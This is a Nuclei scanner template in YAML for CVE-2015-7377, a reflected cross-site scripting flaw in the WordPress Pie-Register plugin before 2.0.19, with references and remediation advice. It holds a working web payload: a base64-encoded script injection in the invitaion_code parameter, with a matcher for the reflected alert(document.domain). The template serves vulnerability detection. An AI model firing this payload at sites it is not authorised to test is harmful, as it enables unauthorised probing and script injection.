53 lines
2.3 KiB
YAML
53 lines
2.3 KiB
YAML
id: CVE-2015-7377
|
|
|
|
info:
|
|
name: WordPress Pie-Register <2.0.19 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
|
|
- https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7377
|
|
- http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html
|
|
- https://wpvulndb.com/vulnerabilities/8212
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2015-7377
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00239
|
|
epss-percentile: 0.61714
|
|
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: genetechsolutions
|
|
product: pie_register
|
|
framework: wordpress
|
|
tags: cve2015,wordpress,wp-plugin,xss,packetstorm,cve,genetechsolutions
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210081857604c1c23099850e1b7fa5861629a4f39915a4937ec058b69f45c97c36a40220045b828831fa6658df8f2fb9d2ea668a85595319c861368f5edef8b3813c2e2a:922c64590222798bb761d5b6d8e72950 |